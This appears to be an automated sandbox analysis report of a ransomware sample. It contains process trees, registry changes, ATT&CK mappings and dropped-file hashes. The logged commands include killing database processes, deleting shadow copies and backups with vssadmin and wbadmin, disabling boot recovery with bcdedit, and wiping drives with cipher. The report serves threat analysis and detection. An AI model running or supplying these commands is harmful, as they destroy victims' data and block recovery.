PID 1104 wrote to memory of 1752	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1752	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1752 wrote to memory of 3548	1752	cmd.exe	cmd.exe
PID 1752 wrote to memory of 3548	1752	cmd.exe	cmd.exe
PID 3548 wrote to memory of 1896	3548	cmd.exe	taskkill.exe
PID 3548 wrote to memory of 1896	3548	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 3928	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 3928	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 3928	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 3928 wrote to memory of 2572	3928	cmd.exe	cmd.exe
PID 3928 wrote to memory of 2572	3928	cmd.exe	cmd.exe
PID 2572 wrote to memory of 3448	2572	cmd.exe	taskkill.exe
PID 2572 wrote to memory of 3448	2572	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 1088	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1088	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1088	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1088 wrote to memory of 1268	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 1268	1088	cmd.exe	cmd.exe
PID 1268 wrote to memory of 2988	1268	cmd.exe	taskkill.exe
PID 1268 wrote to memory of 2988	1268	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 396	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 396	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 396	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 396 wrote to memory of 4596	396	cmd.exe	cmd.exe
PID 396 wrote to memory of 4596	396	cmd.exe	cmd.exe
PID 4596 wrote to memory of 4184	4596	cmd.exe	taskkill.exe
PID 4596 wrote to memory of 4184	4596	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 548	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 548	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 548	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 548 wrote to memory of 4684	548	cmd.exe	cmd.exe
PID 548 wrote to memory of 4684	548	cmd.exe	cmd.exe
PID 4684 wrote to memory of 1620	4684	cmd.exe	taskkill.exe
PID 4684 wrote to memory of 1620	4684	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 1424	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1424	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1424	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1424 wrote to memory of 1748	1424	cmd.exe	cmd.exe
PID 1424 wrote to memory of 1748	1424	cmd.exe	cmd.exe
PID 1748 wrote to memory of 4104	1748	cmd.exe	taskkill.exe
PID 1748 wrote to memory of 4104	1748	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 2468	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 2468	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 2468	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 2468 wrote to memory of 2356	2468	cmd.exe	cmd.exe
PID 2468 wrote to memory of 2356	2468	cmd.exe	cmd.exe
PID 2356 wrote to memory of 3124	2356	cmd.exe	taskkill.exe
PID 2356 wrote to memory of 3124	2356	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 4108	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 4108	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 4108	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exeb896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
"C:\Users\Admin\AppData\Local\Temp\b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1104
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    PID:3148
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3340
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sqlbrowser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4636
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3548
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sql writer.exe
      4⤵
      Kills process with taskkill
      PID:1896
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sqlserv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3448
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1268
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im msmdsrv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2988
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im MsDtsSrvr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4184
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im fdlauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4104
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im Ssms.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3124
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
  2⤵
  PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:4628
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im SQLAGENT.EXE
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:996
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
  2⤵
  PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:4804
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im fdhost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4484
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
  2⤵
  PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:216
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im ReportingServicesService.exe
      4⤵
      Kills process with taskkill
      PID:4048
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
  2⤵
  PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:4440
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im msftesql.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2812
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
  2⤵
  PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:3952
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im pg_ctl.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4488
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
  2⤵
  PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:2816
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -impostgres.exe
      4⤵
      Kills process with taskkill
      PID:1392
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
  2⤵
  PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:3896
  - - C:\Windows\system32\net.exe
      net stop MSSQLServerADHelper100
      4⤵
      PID:2080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        5⤵
        
        PID:1268
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
  2⤵
  PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:1696
  - - C:\Windows\system32\net.exe
      net stop MSSQL$ISARS
      4⤵
      PID:4596
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        5⤵
        
        PID:852
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
  2⤵
  PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:1580
  - - C:\Windows\system32\net.exe
      net stop MSSQL$MSFW
      4⤵
      PID:4572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        5⤵
        
        PID:1620
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
  2⤵
  PID:720
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:756
  - - C:\Windows\system32\net.exe
      net stop SQLAgent$ISARS
      4⤵
      PID:3176
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        5⤵
        
        PID:3736
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
  2⤵
  PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:4784
  - - C:\Windows\system32\net.exe
      net stop SQLAgent$MSFW
      4⤵
      PID:3048
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        5⤵
        
        PID:1332
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
  2⤵
  PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:5068
  - - C:\Windows\system32\net.exe
      net stop SQLBrowser
      4⤵
      PID:544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        5⤵
        
        PID:872
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
  2⤵
  PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:1560
  - - C:\Windows\system32\net.exe
      net stop REportServer$ISARS
      4⤵
      PID:1900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        5⤵
        
        PID:3056
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
  2⤵
  PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:388
  - - C:\Windows\system32\net.exe
      net stop SQLWriter
      4⤵
      PID:4608
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        5⤵
        
        PID:1672
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:1712
  - - C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:2688
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
  2⤵
  PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:4752
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      Deletes system backups
      PID:4596
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:4960
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      Deletes System State backups
      PID:4876
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
  2⤵
  PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:1876
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      Drops file in Windows directory
      PID:4980
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:2232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic.exe SHADOWCOPY /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3288
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
  2⤵
  PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:4968
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} recoverynabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3992
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:4504
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4892
- C:\Windows\SysWOW64\cipher.exe
  cipher /w:\\?\A:
  2⤵
  - Enumerates connected drives
  PID:732
- C:\Windows\SysWOW64\cipher.exe
  cipher /w:\\?\F:
  2⤵
  - Enumerates connected drives
  PID:3176
- C:\Windows\SysWOW64\cipher.exe
  cipher /w:\\?\C:
  2⤵
  PID:4524

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3552
- C:\Users\Admin\AppData\Local\Temp\b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe -network
  2⤵
  - Adds Run key to start application
  - System policy modification
  PID:4684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:1484

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlceip.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2944

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3408

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2904

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1744

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_200_percent.pak

Filesize
1KB

MD5
a232cdebfdbdec87a08fdb84f0109627

SHA1
ad36083fc98edb4361d16e0a6a21e89e1d3e53f4

SHA256
fc3a44e338a97c52d0ea2adb22be15632fb6e77cac3cc6fcb84f5deb2fd883f4

SHA512
d051bac7b1061cddec2eeff81d58fa6fb721f06f8b921c62eaeb61a7100c31075701f7376888899ee22f90f53235a94c78e6e2d2af9e26489f8930bb45bb4d36

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png

Filesize
52KB

MD5
827f4d9bbed7cf3e25460c94eae57e51

SHA1
a42e662b8cbf49b64ba0905e11d6497cb3ce606c

SHA256
24d738865a3f88a5da8d63eccc42c75c1c50d88eef213ccad877626420dce0e9

SHA512
df9c5b790b8edc42f232ed9cb7306373ac90cb7fe407d450df846a2beeee0e470d7e4132cc50e598a6ae531ff48948e3e1ae7f9b23f6640eb3eb472f35ea980c

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_remove_18.svg

Filesize
2KB

MD5
4ddd3bee6c9cd8978efc654b7aba6f18

SHA1
8081fcb4be51aab50507e8192200e6700be40566

SHA256
17be285feb9a0120be90abd2033d243b9721d169673d3a5d709264d177adc46f

SHA512
e2cb61f56bc94ea6513bbdb2f08618a9a12baa4d238fabd8260e60792e37630a8f52dcb3f989cb583a3304c2a90ef6a35b59a3e9d7e6b90744a94bf1a98335b5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png

Filesize
3KB

MD5
009f4d080093c3f2e92504d8f5e1b761

SHA1
8c2165f471388560111f786fc596c45325b4d7f6

SHA256
e7010a3d16cabf3ec5e6a9adf978e14f81b14f9c05717b50ef0c58f0a65a17ea

SHA512
ae80607fa661380dbd4a14fcd9b7bcc17fabdbcd9d1325a2374905f6d5fabbe49af7e38857bf4bccfba9f0dcbac193e8ac6d4324be3514650f2543425221034b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png

Filesize
5KB

MD5
46f9c5e62ac2d2eb64010d9cd3af527a

SHA1
b73eb458236b5761e06518c8341686136e938265

SHA256
c214f73d8ec3719d769dcc1f54f90714760ee9df415fc9330605cb70264137ad

SHA512
9395a46eddfbab995cd9eab782b9cc64eb36914664a88a4e50bf26f949d206ed56391e04706afd2d5b8b2401fdd0130104035efead8404b25b919c3e6f662219

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\duplicate.svg

Filesize
3KB

MD5
a07fa46e03b23f43e63fa92c862af5a0

SHA1
17b2ee759e16b43e8a5ad116c0d8692b54b72e5d

SHA256
d1849e18fedfad224f5bd9768f6cc0442dd205130246f63ae53ea2ab53f46f24

SHA512
4f855fb3add2072f4d140e863a759356a1730fb47a36994bcda573113eaf7bf0e44b116708a9d4c72d242595206b356afe6e15534542fd7bf9d254fd30811a2b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg

Filesize
2KB

MD5
6ff8e51ec80c999d43517ba52532e531

